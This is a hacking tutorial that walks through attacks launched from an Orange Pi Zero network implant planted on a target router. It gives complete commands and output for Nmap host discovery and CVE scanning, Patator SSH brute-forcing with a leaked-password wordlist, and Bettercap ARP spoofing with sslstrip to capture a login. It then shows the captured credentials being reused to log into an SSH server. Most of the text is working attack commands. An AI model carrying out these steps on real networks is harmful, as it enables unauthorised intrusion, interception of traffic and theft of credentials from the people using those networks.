With a tiny computer, hackers can see every website you visit, exploit services on the network, and break into your Wi-Fi router's gateway to manipulate sensitive settings. These attacks can be performed from anywhere once the attacker's computer has been connected to the router via a network implant.
The Orange Pi Zero and Armbian operating system must first be set up for remote access and network-based attacks before proceeding. The operating system is not weaponized out of the box, so be sure to review my previous article on setting everything up first. This kind of attack can be performed with a Raspberry Pi as well, but the below installation commands were only tested with the Orange Pi Zero.
- Previously: How to Set Up Network Implants with a Cheap SBC
This article will focus on performing several network-based attacks after the Orange Pi Zero has been planted on the target router. The tools and attacks featured here are far from a complete depiction of how much damage an attacker can inflict on a network., but it's a good start to showing how dangerous a network implant can be in the wrong hands.
1. Perform Network Recon & CVE Detection with Nmap
Nmap is one of the essential network-mapping tools. We can begin by installing it on the Orange Pi Zero with the following apt-get commands.
root@orangepizero:~# apt-get update && apt-get install nmap
Next, install some useful NSE scripts such as the nmap-vulners and vulscan as shown in my previous article detecting CVEs with Nmap scripts. When those tools are loaded onto the Orange Pi Zero, we can start by identifying the IP address, netmask, and route given to the Orange Pi Zero by target router.
root@orangepizero:~# ip addr
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff
inet 192.168.8.138/24 brd 192.168.8.255 scope global dynamic eth0
valid_lft 86056sec preferred_lft 86056sec
inet6 xxxx::xxxx:xxxx:xxxx:xxxx/64 scope link
valid_lft forever preferred_lft forever
We can see the 192.168.8.138/24 address and presume the router is at 192.168.8.1, verifiable with the ip route command. Then, perform a ping scan (-sn) on the entire network to discover available hosts.
root@orangepizero:~# nmap -sn 192.168.8.1/24
Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:17 UTC
Nmap scan report for 192.168.8.1
Host is up (0.00038s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products)
Nmap scan report for 192.168.8.2
Host is up (0.00049s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products)
Nmap scan report for 192.168.8.179
Host is up (-0.088s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Sony)
Nmap scan report for 192.168.8.183
Host is up (-0.10s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Unknown)
Nmap scan report for 192.168.8.138
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.45 seconds
If, for example, we found the Sony device on 192.168.8.183 to be interesting, we could further probe that host.
root@orangepizero:~# nmap -sV -T4 --script nmap-vulners -F -A 192.168.8.183
Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:19 UTC
Nmap scan report for 192.168.8.183
Host is up (0.00080s latency).
Not shown: 99 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.6p1:
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
|_ CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473
MAC Address: 48:1C:52:9F:A6:71 (Unknown)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see the nmap-vulners NSE script discovered two CVEs with this particular SSH server. The host is almost certainly an Ubuntu machine, so automated updates have probably done a good job about patching severe security vulnerabilities.
We could further probe the service or other hosts on the network with more advanced Nmap scans and scripts. For more on Nmap, check out some of the following articles.
- Top 5 Intrusive Nmap Scripts Hackers & Pentesters Should Know
- How to Automate Brute-Force Attacks for Nmap Scans
- Using the Nmap Scripting Engine (NSE) for Reconnaissance
2. Perform Brute-Force Attacks with Patator
Like Hydra and Medusa, Patator is a highly flexible, full-featured, command-line brute-forcing tool. It has quickly become one of my favorite hacking instruments. In my previous article, Patator was used to perform a dictionary attack against different router gateways, which is very appropriate for a network-based attack such as this Orange Pi Zero hack. This time, however, I'll show Patator's SSH brute-forcing module.
- Don't Miss: How to Break into Router Gateways with Patator
First, install the necessary dependencies required by the Patator Python script. There are quite a few packages, so this process can take up to ten minutes to complete. Prepending the screen command (Screen should be installed) is recommended. In the event the SSH connection breaks, Screen will keep the installation running and accessible when the connection is re-established.
root@orangepizero:~# screen apt-get install libcurl4-openssl-dev python3-dev libssl-dev ldap-utils default-libmysqlclient-dev ike-scan unzip default-jdk libsqlite3-dev libsqlcipher-dev python-setuptools python-pip libpq-dev python-dev libffi6 libffi-dev pkg-config autoconf python-dev cmake
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
adwaita-icon-theme ca-certificates-java default-jdk default-jdk-headless default-jre default-jre-headless fontconfig fontconfig-config fonts-dejavu-core gtk-update-icon-cache hicolor-icon-theme ike-scan
java-common ldap-utils libasyncns0 libatk-bridge2.0-0 libatk-wrapper-java libatk-wrapper-java-jni libatk1.0-0 libatk1.0-data libatspi2.0-0 libavahi-client3 libavahi-common-data libavahi-common3
libcairo-gobject2 libcairo2 libcolord2 libcroco3 libcups2 libcurl4-openssl-dev libdatrie1 libdrm2 libegl1-mesa libepoxy0 libexpat1-dev libflac8 libfontconfig1 libfontenc1 libfreetype6 libgbm1
libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libgif7 libgl1-mesa-glx libglapi-mesa libgraphite2-3 libgtk-3-0 libgtk-3-common libgtk2.0-0 libgtk2.0-common libharfbuzz0b libice6 libjbig0 libjpeg62-turbo
libjson-glib-1.0-0 libjson-glib-1.0-common liblcms2-2 libnspr4 libnss3 libogg0 libpango-1.0-0 libpangocairo-1.0-0 libpangoft2-1.0-0 libpixman-1-0 libpulse0 libpython3-dev libpython3.5 libpython3.5-dev
librest-0.7-0 librsvg2-2 librsvg2-common libsm6 libsndfile1 libsoup-gnome2.4-1 libsqlcipher-dev libsqlcipher0 libsqlite3-dev libthai-data libthai0 libtiff5 libvorbis0a libvorbisenc2 libwayland-client0
libwayland-cursor0 libwayland-egl1-mesa libwayland-server0 libx11-6 libx11-data libx11-xcb1 libxau6 libxaw7 libxcb-dri2-0 libxcb-dri3-0 libxcb-glx0 libxcb-present0 libxcb-render0 libxcb-shape0 libxcb-shm0
libxcb-sync1 libxcb-xfixes0 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxft2 libxi6 libxinerama1 libxkbcommon0 libxmu6 libxmuu1 libxpm4 libxrandr2 libxrender1 libxshmfence1
libxt6 libxtst6 libxv1 libxxf86dga1 libxxf86vm1 openjdk-8-jdk openjdk-8-jdk-headless openjdk-8-jre openjdk-8-jre-headless python3-dev python3.5-dev shared-mime-info x11-common x11-utils
0 upgraded, 131 newly installed, 0 to remove and 0 not upgraded.
Need to get 112 MB of archives.
After this operation, 312 MB of additional disk space will be used.
Do you want to continue? [Y/n]
Upgrade the setuptools and wheel packages using the following pip command.
root@orangepizero:~# pip install --upgrade setuptools wheel
Collecting setuptools
Downloading https://files.pythonhosted.org/packages/c8/b0/cc6b7ba28d5fb790cf0d5946df849233e32b8872b6baca10c9e002ff5b41/setuptools-41.0.0-py2.py3-none-any.whl (575kB)
100% |████████████████████████████████| 583kB 181kB/s
Installing collected packages: setuptools
Found existing installation: setuptools 33.1.1
Not uninstalling setuptools at /usr/lib/python2.7/dist-packages, outside environment /usr
Successfully installed setuptools-41.0.0
Clone the Patator GitHub repository with the git command.
root@orangepizero:~# git clone https://github.com/lanjelot/patator/ /opt/patator
Cloning into '/opt/patator'...
remote: Enumerating objects: 457, done.
remote: Total 457 (delta 0), reused 0 (delta 0), pack-reused 457
Receiving objects: 100% (457/457), 325.11 KiB | 149.00 KiB/s, done.
Resolving deltas: 100% (157/157), done.
Change (cd) into the new /opt/patator/ directory.
root@orangepizero:~# cd /opt/patator/
Then, use pip again to install more requirements. This process can take up to 20 minutes to complete. The pynacl and cryptography packages seemed to take especially long in my tests, so be patient.
root@orangepizero:/opt/patator# pip install -r requirements.txt
Downloading https://files.pythonhosted.org/packages/cf/ae/94e70d49044ccc234bfdba20114fa947d7ba6eb68a2e452d89b920e62227/paramiko-2.4.2-py2.py3-none-any.whl (193kB)
100% |████████████████████████████████| 194kB 216kB/s
Collecting pycurl (from -r requirements.txt (line 2))
Downloading https://files.pythonhosted.org/packages/e8/e4/0dbb8735407189f00b33d84122b9be52c790c7c3b25286826f4e1bdb7bde/pycurl-7.43.0.2.tar.gz (214kB)
100% |████████████████████████████████| 215kB 172kB/s
Collecting ajpy (from -r requirements.txt (line 3))
Downloading https://files.pythonhosted.org/packages/12/dd/e641d8c0b3b14eed50122a3c090ff9150bd0988fd0790d4819cd8083e83d/ajpy-0.0.4.tar.gz
Collecting pyopenssl (from -r requirements.txt (line 5))
Downloading https://files.pythonhosted.org/packages/01/c8/ceb170d81bd3941cbeb9940fc6cc2ef2ca4288d0ca8929ea4db5905d904d/pyOpenSSL-19.0.0-py2.py3-none-any.whl (53kB)
100% |████████████████████████████████| 61kB 66kB/s
Collecting cx_Oracle (from -r requirements.txt (line 6))
Downloading https://files.pythonhosted.org/packages/4b/aa/99e49d10e56ff0263a8927f4ddb7e8cdd4671019041773f61b3259416043/cx_Oracle-7.1.2.tar.gz (289kB)
100% |████████████████████████████████| 296kB 177kB/s
Collecting mysqlclient (from -r requirements.txt (line 7))
Downloading https://files.pythonhosted.org/packages/f4/f1/3bb6f64ca7a429729413e6556b7ba5976df06019a5245a43d36032f1061e/mysqlclient-1.4.2.post1.tar.gz (85kB)
100% |████████████████████████████████| 92kB 98kB/s
Collecting psycopg2-binary (from -r requirements.txt (line 8))
Downloading https://files.pythonhosted.org/packages/dc/93/bb5655730913b88f9068c6b596177d1df83be0d476671199e17b06ea8436/psycopg2-binary-2.8.2.tar.gz (369kB)
100% |████████████████████████████████| 378kB 169kB/s
Collecting pycrypto (from -r requirements.txt (line 9))
Downloading https://files.pythonhosted.org/packages/60/db/645aa9af249f059cc3a368b118de33889219e0362141e75d4eaf6f80f163/pycrypto-2.6.1.tar.gz (446kB)
100% |████████████████████████████████| 450kB 114kB/s
...
Stored in directory: /root/.cache/pip/wheels/43/61/c8/0a4464601ce180d26e0a8dfdfa88c824e419dcc65bd43bda6e
Running setup.py bdist_wheel for bcrypt ... done
Stored in directory: /root/.cache/pip/wheels/6c/f0/60/8a8ebee44d14d3d6696f1e78960500777cb5b579caf33c1fe3
Running setup.py bdist_wheel for pycryptodomex ... done
Stored in directory: /root/.cache/pip/wheels/83/37/75/85a95885e1e48d22cc6c964680e7938a19ca7c80eb814b2ff0
Running setup.py bdist_wheel for cffi ... done
Stored in directory: /root/.cache/pip/wheels/bb/f8/22/e3e8d9dd87e0cc6df8201325bd0ae815e701d1ef2b95571cf2
Successfully built pycurl ajpy cx-Oracle mysqlclient psycopg2-binary pycrypto IPy pynacl cryptography bcrypt pycryptodomex cffi
Installing collected packages: cffi, pynacl, asn1crypto, enum34, ipaddress, cryptography, bcrypt, pyasn1, paramiko, pycurl, ajpy, pyopenssl, cx-Oracle, mysqlclient, psycopg2-binary, pycrypto, dnspython, IPy, pycryptodomex, ply, pysmi, pysnmp
Successfully installed IPy-1.0 ajpy-0.0.4 asn1crypto-0.24.0 bcrypt-3.1.6 cffi-1.12.2 cryptography-2.6.1 cx-Oracle-7.1.2 dnspython-1.16.0 enum34-1.1.6 ipaddress-1.0.22 mysqlclient-1.4.2.post1 paramiko-2.4.2 ply-3.11 psycopg2-binary-2.8.1 pyasn1-0.4.5 pycrypto-2.6.1 pycryptodomex-3.8.1 pycurl-7.43.0.2 pynacl-1.3.0 pyopenssl-19.0.0 pysmi-0.3.3 pysnmp-4.4.9
When that's done, verify Patator is working and view available modules with the --help option.
root@orangepizero:/opt/patator# ./patator.py --help
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator.py module --help
Available modules:
+ ftp_login : Brute-force FTP
+ ssh_login : Brute-force SSH
+ telnet_login : Brute-force Telnet
+ smtp_login : Brute-force SMTP
+ smtp_vrfy : Enumerate valid users using SMTP VRFY
+ smtp_rcpt : Enumerate valid users using SMTP RCPT TO
+ finger_lookup : Enumerate valid users using Finger
+ http_fuzz : Brute-force HTTP
+ rdp_gateway : Brute-force RDP Gateway
+ ajp_fuzz : Brute-force AJP
+ pop_login : Brute-force POP3
+ pop_passd : Brute-force poppassd (http://netwinsite.com/poppassd/)
+ imap_login : Brute-force IMAP4
+ ldap_login : Brute-force LDAP
+ smb_login : Brute-force SMB
+ smb_lookupsid : Brute-force SMB SID-lookup
+ rlogin_login : Brute-force rlogin
+ vmauthd_login : Brute-force VMware Authentication Daemon
+ mssql_login : Brute-force MSSQL
+ oracle_login : Brute-force Oracle
+ mysql_login : Brute-force MySQL
+ mysql_query : Brute-force MySQL queries
+ rdp_login : Brute-force RDP (NLA)
+ pgsql_login : Brute-force PostgreSQL
+ vnc_login : Brute-force VNC
+ dns_forward : Forward DNS lookup
+ dns_reverse : Reverse DNS lookup
+ snmp_login : Brute-force SNMP v1/2/3
+ ike_enum : Enumerate IKE transforms
+ unzip_pass : Brute-force the password of encrypted ZIP files
+ keystore_pass : Brute-force the password of Java keystore files
+ sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
+ umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
+ tcp_fuzz : Fuzz TCP services
+ dummy_test : Testing module
The very same SSH service, discovered previously, can now be brute-forced using Patator's ssh_login module. To view the available ssh_login options, use the below command.
root@orangepizero:/opt/patator# ./patator.py ssh_login
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: ssh_login <module-options ...> [global-options ...]
Examples:
ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'
Module options:
host : target host
port : target port [22]
user : usernames to test
password : passwords to test
auth_type : type of password authentication to use [password|keyboard-interactive|auto]
keyfile : file with RSA, DSA or ECDSA private key to test
persistent : use persistent connections [1|0]
For a more complete, comprehensive list of options and arguments, use the ssh_login and --help options together.
root@orangepizero:/opt/patator# ./patator.py ssh_login --help
For demostration purposes, I'm using a wordlist created from leaked password databases. This can be quickly downloaded onto the Orange Pi Zero with the below wget command.
root@orangepizero:/opt/patator# wget 'https://git.io/fhhvc' -O /tmp/simple_wordlist.txt
--2019-04-15 02:19:09-- https://git.io/fhhvc
Resolving git.io (git.io)... 52.203.53.176
Connecting to git.io (git.io)|52.203.53.176|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt [following]
--2019-04-15 02:19:13-- https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.8.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.8.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25585 (25K) [text/plain]
Saving to: ‘/tmp/simple_wordlist.txt’
/tmp/simple_wordlist.txt 100%[==============================>] 24.99K 59.7KB/s in 0.4s
2019-04-15 02:19:22 (59.7 KB/s) - ‘/tmp/simple_wordlist.txt’ saved [25585/25585]
Finally, brute-force the SSH service using the following Patator command.
root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=root password=FILE0 0=/tmp/simple_wordlist.txt -t 1
INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-04-14 07:25 UTC
INFO -
INFO - code size time | candidate | num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 1 22 2.005 | 123456 | 1 | Authentication failed.
INFO - 1 22 2.277 | Abcdef123 | 2 | Authentication failed.
INFO - 1 22 1.344 | a123456 | 3 | Authentication failed.
INFO - 1 22 1.814 | little123 | 4 | Authentication failed.
INFO - 1 22 2.081 | nanda334 | 5 | Authentication failed.
INFO - 1 22 2.023 | N97nokia | 6 | Authentication failed.
INFO - 1 22 1.676 | password | 7 | Authentication failed.
INFO - 1 22 2.249 | Pawerjon123 | 8 | Authentication failed.
INFO - 1 22 2.180 | 421uiopy258 | 9 | Authentication failed.
INFO - 1 22 2.116 | MYworklist123 | 10 | Authentication failed.
INFO - 1 22 1.879 | 12345678 | 11 | Authentication failed.
INFO - 1 22 2.015 | qwerty | 12 | Authentication failed.
INFO - 1 22 1.772 | nks230kjs82 | 13 | Authentication failed.
INFO - 1 22 2.212 | trustno1 | 14 | Authentication failed.
INFO - 1 22 1.631 | zxcvbnm | 15 | Authentication failed.
INFO - 1 22 2.116 | N97nokiamini | 16 | Authentication failed.
INFO - 1 22 2.050 | letmein | 17 | Authentication failed.
INFO - 1 22 1.814 | 123456789 | 18 | Authentication failed.
INFO - 1 22 2.107 | myplex | 19 | Authentication failed.
INFO - 1 22 0.042 | tokyoneon | 20 | Authentication failed.
INFO - 1 22 2.375 | gm718422@ | 21 | Authentication failed.
INFO - 1 22 1.613 | churu123A | 22 | Authentication failed.
INFO - 1 22 1.914 | abc123 | 23 | Authentication failed.
INFO - 1 22 1.820 | plex123 | 24 | Authentication failed.
INFO - 1 22 1.778 | any123456 | 25 | Authentication failed.
INFO - 1 22 2.048 | Lwf1681688 | 26 | Authentication failed.
INFO - Hits/Done/Skip/Fail/Size: 26/26/0/0/26, Avg: 0 r/s, Time: 0h 0m 51s
Patator will brute-force the host= on the specified post= with the wordlist (0). To avoid overwhelming the SSH service with too many password attempts per second, use the -t to specify the number of concurrent threads. This value is set to ten by default, but increase and decrease it as needed.
3. Perform Man-in-the-Middle Attacks with Bettercap
Before installing Bettercap, the Go (Golang) programming language will need to be installed first. Bettercap relies on the later version of Golang that isn't available in the Debian repositories. To get the latest version of Golang, start by downloading the dependencies.
root@orangepizero:~# apt-get install libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
build-essential is already the newest version (12.3).
golang is already the newest version (2:1.7~5).
The following additional packages will be installed:
libnetfilter-queue1 libnfnetlink-dev libpcap0.8-dev pkg-config
Recommended packages:
libusb-1.0-doc
The following NEW packages will be installed:
libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libpcap-dev libpcap0.8-dev libusb-1.0-0-dev pkg-config
0 upgraded, 7 newly installed, 0 to remove and 0 not upgraded.
Need to get 405 kB of archives.
After this operation, 1,142 kB of additional disk space will be used.
Do you want to continue? [Y/n]
If you're not already root, change into the /root/ directory for the following commands. Using the /tmp directory isn't advised as the Orange Pi Zero may run out of memory during specific processes.
root@orangepizero:~# cd /root/
Then, download the tar.gz file containing the Golang source code.
root@orangepizero:~# wget 'https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz'
--2019-04-13 19:52:48-- https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz
Resolving dl.google.com (dl.google.com)... 172.217.194.93, 172.217.194.136, 172.217.194.190, ...
Connecting to dl.google.com (dl.google.com)|172.217.194.93|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 106218905 (101M) [application/octet-stream]
Saving to: ‘go1.12.7.linux-armv6l.tar.gz’
go1.12.7.linux-armv6l.tar.gz 100%[==============================>] 101.30M 3.28MB/s in 34s
2019-04-13 19:53:22 (3.02 MB/s) - ‘go1.12.7.linux-armv6l.tar.gz’ saved [106218905/106218905]
Next, unpack the compressed tar.gz file.
root@orangepizero:~# tar -C /usr/local -xzf go1.*.tar.gz
The $PATH needs to be defined to perform the following commands.
root@orangepizero:~# export PATH=$PATH:/usr/local/go/bin
Now, before cloning the Bettercap repository, the amount of available "swap memory" on the Orange Pi Zero needs to be expanded. Swap is defined as part of the hard drive that has been allocated by the operating system as temporary memory. When the operating system has used up all of the available hardware RAM (512 MB for the Orange Pi Zero), it uses the swap.
To create a new swap area, use the below dd command to create a 2 GB (2048) file containing /dev/zero null data. This command should take about three minutes to complete.
root@orangepizero:~# dd if=/dev/zero of=/root/swapfile bs=1M count=2048
2048+0 records in
2048+0 records out
2147483648 bytes (2.1 GB, 2.0 GiB) copied, 195.927 s, 11.0 MB/s
Then, use the mkswap command. Disregard the "insecure permissions" warning. On a non-hacking system, this command would be executed differently. But it's not essential to this specific scenario.
root@orangepizero:~# mkswap /root/swapfile
mkswap: /root/swapfile: insecure permissions 0644, 0600 suggested.
Setting up swapspace version 1, size = 2 GiB (2147479552 bytes)
no label, UUID=e629a001-7a20-4346-8479-4a04fae459af
Enable the new swap area with the swapon command.
root@orangepizero:~# swapon /root/swapfile
swapon: /root/swapfile: insecure permissions 0644, 0600 suggested.
The new swap space can be verified using the free command to view available memory.
root@orangepizero:~# free -ht
total used free shared buff/cache available
Mem: 493M 84M 9.0M 604K 399M 397M
Swap: 2.2G 19M 2.2G
Total: 2.7G 104M 2.2G
Notice the Swap: is over 2 GB. Now, back to the Bettercap install process. Clone the Bettercap GitHub repository with the following go command.
root@orangepizero:~# go get github.com/bettercap/bettercap
Then, define the $GOPATH with the export command.
root@orangepizero:~# export GOPATH=/root/go/
Change into the newly create Bettercap directory.
root@orangepizero:~# cd $GOPATH/src/github.com/bettercap/bettercap
Execute the make build command. No output will occur.
root@orangepizero:~/go/src/github.com/bettercap/bettercap# make build
Finally, install Bettercap with the make install command.
root@orangepizero:~/go/src/github.com/bettercap/bettercap# make install
To start using Bettercap, use the following command with the -iface option to specify the target (router) interface. Otherwise, Bettercap might attack devices authenticated to the Orange Pi Zero's Wi-Fi hotspot — if that was set up previously.
Screen is also recommended here. It will keep Bettercap running persistently if you choose to temporarily disconnect from the Orange Pi Zero and reconnect at a later time.
root@orangepizero:~/go/src/github.com/bettercap/bettercap# screen bettercap -iface eth0
bettercap v2.23 (built for linux arm with go1.12.4) [type 'help' for a list of commands]
192.168.8.0/24 > 192.168.8.138 »
For starters, we can use the help command to view available options and running modules.
10.#.#.#/24 > 10.#.#.## » help
help MODULE : List available commands or show module specific help if no module name is provided.
active : Show information about active modules.
quit : Close the session and exit.
sleep SECONDS : Sleep for the given amount of seconds.
get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
set NAME VALUE : Set the VALUE of variable NAME.
read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
clear : Clear the screen.
include CAPLET : Load and run this caplet in the current session.
! COMMAND : Execute a shell command and print its output.
alias MAC NAME : Assign an alias to a given endpoint given its MAC address.
Modules
any.proxy > not running
api.rest > not running
arp.spoof > not running
ble.recon > not running
caplets > not running
dhcp6.spoof > not running
dns.spoof > not running
events.stream > running
gps > not running
hid > not running
http.proxy > not running
http.server > not running
https.proxy > not running
https.server > not running
mac.changer > not running
mysql.server > not running
net.probe > not running
net.recon > not running
net.sniff > not running
packet.proxy > not running
syn.scan > not running
tcp.proxy > not running
ticker > not running
ui > not running
update > not running
wifi > not running
wol > not running
192.168.8.0/24 > 192.168.8.138 »
Then, fetch the latest caplets from the Bettercap repository with the caplets.update command. Caplets are used to automate Bettercap commands and options.
10.#.#.#/24 > 10.#.#.## » caplets.update
[21:18:57] [sys.log] [inf] caplets downloading caplets from https://github.com/bettercap/caplets/archive/master.zip ...
[21:19:03] [sys.log] [inf] caplets installing caplets to /usr/local/share/bettercap/caplets ...
Use caplets.show to view the installed caplets and their location on the operating system. You are encouraged to review the caplet files for brief descriptions of what each one does.
10.#.#.#/24 > 10.#.#.## » caplets.show
┌─────────────────────────────────────┬────────────────────────────────────────────────────────────────────────────┬────────┐
│ Name │ Path │ Size │
├─────────────────────────────────────┼────────────────────────────────────────────────────────────────────────────┼────────┤
│ ap │ /usr/local/share/bettercap/caplets/ap.cap │ 307 B │
│ crypto-miner/crypto-miner │ /usr/local/share/bettercap/caplets/crypto-miner/crypto-miner.cap │ 666 B │
│ download-autopwn/download-autopwn │ /usr/local/share/bettercap/caplets/download-autopwn/download-autopwn.cap │ 2.6 kB │
│ fb-phish/fb-phish │ /usr/local/share/bettercap/caplets/fb-phish/fb-phish.cap │ 140 B │
│ gitspoof/gitspoof │ /usr/local/share/bettercap/caplets/gitspoof/gitspoof.cap │ 216 B │
│ gps │ /usr/local/share/bettercap/caplets/gps.cap │ 109 B │
│ hstshijack/hstshijack │ /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap │ 799 B │
│ http-req-dump/http-req-dump │ /usr/local/share/bettercap/caplets/http-req-dump/http-req-dump.cap │ 591 B │
│ http-ui │ /usr/local/share/bettercap/caplets/http-ui.cap │ 382 B │
│ https-ui │ /usr/local/share/bettercap/caplets/https-ui.cap │ 661 B │
│ jsinject/jsinject │ /usr/local/share/bettercap/caplets/jsinject/jsinject.cap │ 210 B │
│ local-sniffer │ /usr/local/share/bettercap/caplets/local-sniffer.cap │ 244 B │
│ login-manager-abuse/login-man-abuse │ /usr/local/share/bettercap/caplets/login-manager-abuse/login-man-abuse.cap │ 236 B │
│ mana │ /usr/local/share/bettercap/caplets/mana.cap │ 61 B │
│ massdeauth │ /usr/local/share/bettercap/caplets/massdeauth.cap │ 302 B │
│ mitm6 │ /usr/local/share/bettercap/caplets/mitm6.cap │ 551 B │
│ netmon │ /usr/local/share/bettercap/caplets/netmon.cap │ 42 B │
│ pita │ /usr/local/share/bettercap/caplets/pita.cap │ 900 B │
│ proxy-script-test/proxy-script-test │ /usr/local/share/bettercap/caplets/proxy-script-test/proxy-script-test.cap │ 57 B │
│ rogue-mysql-server │ /usr/local/share/bettercap/caplets/rogue-mysql-server.cap │ 501 B │
│ rtfm/rtfm │ /usr/local/share/bettercap/caplets/rtfm/rtfm.cap │ 210 B │
│ simple-passwords-sniffer │ /usr/local/share/bettercap/caplets/simple-passwords-sniffer.cap │ 131 B │
│ tcp-req-dump/tcp-req-dump │ /usr/local/share/bettercap/caplets/tcp-req-dump/tcp-req-dump.cap │ 413 B │
│ web-override/web-override │ /usr/local/share/bettercap/caplets/web-override/web-override.cap │ 254 B │
└─────────────────────────────────────┴────────────────────────────────────────────────────────────────────────────┴────────┘
To quickly enumerate active hosts on the network, invoke the netmon caplet with the include command.
10.#.#.#/24 > 10.#.#.## » include netmon
┌───────────────┬───────────────────┬─────────────┬────────────────────────────┬───────┬────────┬──────────┐
│ IP ▴ │ MAC │ Name │ Vendor │ Sent │ Recvd │ Seen │
├───────────────┼───────────────────┼─────────────┼────────────────────────────┼───────┼────────┼──────────┤
│ 192.168.8.138 │ XX:XX:XX:XX:XX:XX │ eth0 │ │ 0 B │ 0 B │ 21:18:37 │
│ 192.168.8.1 │ XX:XX:XX:XX:XX:XX │ gateway │ Mediabridge Products, LLC. │ 19 kB │ 8.6 kB │ 21:18:37 │
│ │ │ │ │ │ │ │
│ 192.168.8.179 │ XX:XX:XX:XX:XX:XX │ │ Sony Corporation │ 32 kB │ 128 kB │ 21:20:24 │
│ 192.168.8.193 │ XX:XX:XX:XX:XX:XX │ Windows 10 │ │ 916 B │ 1.3 kB │ 21:20:20 │
└───────────────┴───────────────────┴─────────────┴────────────────────────────┴───────┴────────┴──────────┘
↑ 54 kB / ↓ 433 kB / 4310 pkts
Alternatively, traffic transmitting between devices on the network can be sniffed by running the following six commands in order.
10.#.#.#/24 > 10.#.#.## » set http.proxy.sslstrip true
10.#.#.#/24 > 10.#.#.## » set arp.spoof.internal true
10.#.#.#/24 > 10.#.#.## » set net.sniff.verbose false
10.#.#.#/24 > 10.#.#.## » net.sniff on
10.#.#.#/24 > 10.#.#.## » http.proxy on
10.#.#.#/24 > 10.#.#.## » arp.spoof on
Bettercap will begin to display a ton of data transmitting over the network. In some cases, there may be servers and services running on the network that don't support HTTPS or use it by default. These are prime targets for tools like Bettercap.
Below is an example of a POST request made by a user authenticating to a media server running on one of the network devices.
POST /media_server/Users/authenticatebyname HTTP/1.1
Host: 192.168.8.183:8096
Accept-Encoding: gzip, deflate
X-media-Authorization: MediaBrowser Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Ni4wfDE1NTUzMTE3NzE5Mjg1", Version="4.0.2.0"
Content-Length: 46
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Referer: http://192.168.8.183:8096/web/index.html
Content-Type: application/json
Origin: http://192.168.8.183:8096
Accept: application/json
Accept-Language: en-US,en;q=0.5
{
"Username": "tokyoneon",
"Pw": "secure_password-321"
}
Bettercap displays the username and password data found in the login request. These credentials can be used to pivot to other devices on the network, for example, the previously discovered SSH server on 192.168.8.183. Now that the attacker has some sense of the target's preferred username and password scheme, they can test the credentials against other services on the network.
root@orangepizero:~# cd /opt/patator/
root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=tokyoneon password='secure_password-321' -t 1
INFO - code size time | candidate | num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 0 39 0.117 | | 1 | SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 0 r/s, Time: 0h 0m 1s
The Patator request didn't return an "Authentication failed" message this time. This is a pretty good indication the password is correct. The same username and password can be used to log into the SSH server for a password reuse attack.
root@orangepizero:/opt/patator# cd
root@orangepizero:~# ssh -p 22 tokyoneon@192.168.8.183
The authenticity of host '192.168.8.183 (192.168.8.183)' can't be established.
ECDSA key fingerprint is SHA256:3QmOhr8syz8l4HBWICG53DdVE2fStfHdO2Ri/nU4hBc.
Are you sure you want to continue connecting (yes/no)? yes
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-29-generic x86_64)
